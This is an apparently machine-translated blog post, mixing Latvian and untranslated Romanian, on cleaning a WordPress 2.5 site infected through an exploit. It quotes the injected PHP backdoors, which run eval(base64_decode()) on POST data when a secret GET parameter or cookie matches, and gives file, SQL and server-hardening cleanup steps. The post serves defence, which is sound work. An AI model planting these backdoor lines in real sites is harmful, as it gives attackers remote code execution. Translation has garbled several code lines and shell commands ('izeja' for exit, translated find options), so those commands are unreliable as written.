Pirms lasīt šo ziņu, jums ir jāredz ziņa šeit, lai kaut ko saprastu. :)

Vairākos stealthsettings.com emuāru failos atradu tālāk norādītajiem līdzīgus kodus, kas parādījās inficēšanās ar WordPress izmantošana.:

<?php if($_GET['573abcb060974771']==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST['fails'])); izeja; } ?>

un

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['fails'])); izeja; } ?>

Iepriekš minētajā gadījumā runa ir par failu xmlrpc.php no Miegains, bet vienā grep serverī var redzēt, ka avotos ir diezgan daudz šāda veida kodu.

Inficēto failu tīrīšana:

Ooookkkkyouak
1. Labākais risinājums, kad tas ir izdarīts dublēšana- un iztīrīta datubāze, tā ir sa DZĒST failiem WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.

Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST['fails'])); izeja; } ?><?php get_header(); ?>

2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.

find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “*_giff”
find . -name “*_pngg”
find . -name “wp-info.txt”

3. in /tmp , cautati si stergeti folderele de genul tmpYwbzT2

Curatare SQL :

1. in tabelul tabelul wp_options vedeti daca exista si stergeti liniile: internal_links_cacheVerdzība rss_f541b3abd05e7962fcab37737f40fad8 un wordpress_options.

2. Tot in wp_options, mergeti la active_plugins si stergeti daca exista, un plugin care se termina intr-una din extensiile *_new.php, *_old.php, *.jpgg, *.giff, *.pngg sau daca este alta extensie suspecta, verificati cu atentie.

3. In tabelul wp_users, vedeti daca exista un user care nu are scris nimic in dreptul lui, pe coloana user_nicename. Stergeti acest user, dar retineti numarul de pe coloana ID. Acest user este posibil sa foloseasca “WordPress” ca user_login si apare ca este creat la data de 00:00:00 0000-00-00 .

4. Mergeti in tabelul wp_usermeta un izdzēsiet visas rindas, kas pieder iepriekš norādītajam ID.

Kad esat pabeidzis šo sql tīrīšanu, deaktivizējiet un pēc tam aktivizējiet kādu spraudni. (emuārā -> Informācijas panelis —> spraudņi)

Servera drošība:

1. Skatiet, kuri direktoriji un faili ir "rakstāms” (chmod 777) un mēģiniet ievietot a pūtējs kas vairs nepieļaus viņu rakstīšanu nevienā līmenī. (piemēram, chmod 644)

atrast. -ilgviļņi -2 –ls

2. Skatiet, kuri faili iestata bitu dienvidos vai slidot . Ja neizmantojat šos failus, ievietojiet tos chmod 0 vai atinstalējiet pakotni, kurā tie ir. Viņi ir ļoti bīstami, jo izpilda ar privilēģijām.grupai"Vai"sakne”, nevis ar parastā lietotāja privilēģijām, kas izpilda šo failu.

atrast / -tipa f -perm -04000 -ls
atrast / -tipa f -perm -02000 -ls

3. Pārbaudiet, kuri porti ir atvērti, un mēģiniet aizvērt vai nodrošināt tos, kas netiek izmantoti.

netstat -an | grep -i saraksts

Tas arī viss. Es to redzu daži emuāri ir aizliegti Google meklēšana un citi saka "Well done!!!" . Nu es to būtu izdarījis viņu vietā... bet ko tu saki, ja Google sāks banot visas vietnes kas to dara SŪTOJU SPAMU un iepako Trojas zirgus (Trojan.Clicker.HTML) cepumos?